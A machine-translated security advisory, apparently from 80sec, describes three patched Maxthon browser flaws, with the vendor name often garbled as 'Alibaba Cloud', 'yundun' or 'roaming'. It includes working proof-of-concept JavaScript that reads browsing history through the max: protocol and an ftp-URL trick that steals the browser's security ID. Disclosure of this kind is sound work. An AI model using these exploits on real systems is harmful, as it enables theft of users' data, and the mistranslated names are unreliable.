Several security vulnerabilities repaired by Alibaba Cloud

After 80sec notifies yundun of the security vulnerabilities, yundun released a new version of browser on 6.30 to fix the Security Vulnerabilities mentioned above. For more information, see http://blog.maxthon.cn/. the three security questions are updated and the main questions are as follows:

Vulnerability Source: http://www.80sec.com/release/maxthon-vulns-poc.txt

1. Local cross-origin vulnerability caused by browser kernel Vulnerability

Vulnerability Description: maxthon uses the system's IE kernel, but this kernel may have some security vulnerabilities that cause cross-origin attacks. The Traveling domain such as max: is locally equivalent to file: //, so this cross-origin attack will cause javascript code to be executed in the local context. Here, only the POC that gets the browsing history is provided.

Vulnerability POC:

<a href="">Maxthon Exploit</a>
<script>
function win(){
x=window.open("max:history");
setTimeout(function(){
x.location=new String("javascript:x=maxHistory.history.list.site.loadData();for(i=0;i<x.length;i++) document.write(x[i].site+”<br>”);”)
},3000)
}
window.onload=function(){
for (i=0;i<document.links.length;i++) {
document.links[i].href=”javascript:win()”
}
}
</script>


Vulnerability fix: This security vulnerability has been fixed in the new version of Alibaba Cloud before the IE kernel is fixed.

2. Remote modification of arbitrary user settings caused by a Security Center Vulnerability

Vulnerability Description: roaming does not know much about some features of the IE kernel, resulting in security vulnerabilities in some special situations. The roaming control center is actually a set of HTML + JAVASCRIPT. Through these pages, you can read sensitive data, modify browser settings, and download files. Of course, Alibaba Cloud also has its own security policy. Placing HTML files on an external site cannot be called directly, because Alibaba Cloud has a security control policy, security. src. The file code is as follows:


var max_security_id=; var url=String(document.location).toLowerCase(); if(url.indexOf(file://)>-1&&url.indexOf(http://)==-1&&url.indexOf(https://)==-1){ max_security_id={B73B3AC9-B009-4429-AE67-514332D791FE}; }else{ document.location=about:blank; }

Max_security_id is a parameter required by roaming when calling various controls. This parameter is required in various functions, and the max_security_id of each machine is different. If we can obtain this max_security_id, we can call various functions such as settings, read sensitive data, and even execute remote code on any remote site.

First, this max_security_id seems to be changed every time it is started. This max_security_id will be stored in the template/security. src of the installation directory, and we can make the following calls on our site page:


<script src="E:Program FilesMaxthon2emplatesecurity.src"></script>
<script src="d:Program FilesMaxthon2emplatesecurity.src"></script>
<script src="c:Program FilesMaxthon2emplatesecurity.src"></script>


Don't be surprised. Roaming allows calling local files in this way :), but security. src is also restricted. Values are assigned only when location contains file: // and does not contain http: // and https: //. Otherwise, values are redirected. Here, an error occurs because the blacklist policy allows you to use a protocol such as ftp: //. It is also easy to include file:


ftp://www.foo.com/exploit.html#file://80sec.com


In this example, the address contains exploit.html, but the location contains file: //. If the security policy is grayed out, max_security_id can be obtained. Then, max_security_id can be used to perform all operations.

Vulnerability POC:

Set up an anonymous ftp server www.foo.com and make the following reference on a malicious site:


<iframe src="ftp://www.foo.com/history/index.htm#file:///www.80sec.com" width=100% height=100%>


In/history


<script type="text/javascript" src="../security.src"></script>


Change


<script src="E:Program FilesMaxthon2emplatesecurity.src"></script>
<script src="d:Program FilesMaxthon2emplatesecurity.src"></script>
<script src="c:Program FilesMaxthon2emplatesecurity.src"></script>


You can modify the browser settings and read historical records by modifying the index.htm content.

Vulnerability fix: the new version fixes the code


var max_security_id=; if(String(window.document.location).toLowerCase().indexOf(file://)==0){ max_security_id={02E14D94-53C8-4B6D-89AE-755DC5299C6C}; }else{ document.location=about:blank; }


Only local files can reference this js file. This problem is fixed.

3. Cross-site scripting vulnerability in RSS subscription

Vulnerability Description: An xss vulnerability occurs when you access a problematic page due to a problem in implementing the rss function.

Vulnerability POC: Subscribe to http://www.80sec.com/feedto see the effect :)

Vulnerability fix: The new version has been fixed.

Maxthon is very rigorous in dealing with vulnerabilities. We hope that Maxthon users can upgrade to the new version as soon as possible.

The content on this site is original. For reprinted content, be sure to keep your signatures and links!
Html "> Several security vulnerabilities repaired by Alibaba Cloud: Http://www.80sec.com/maxthon-vulns-poc.html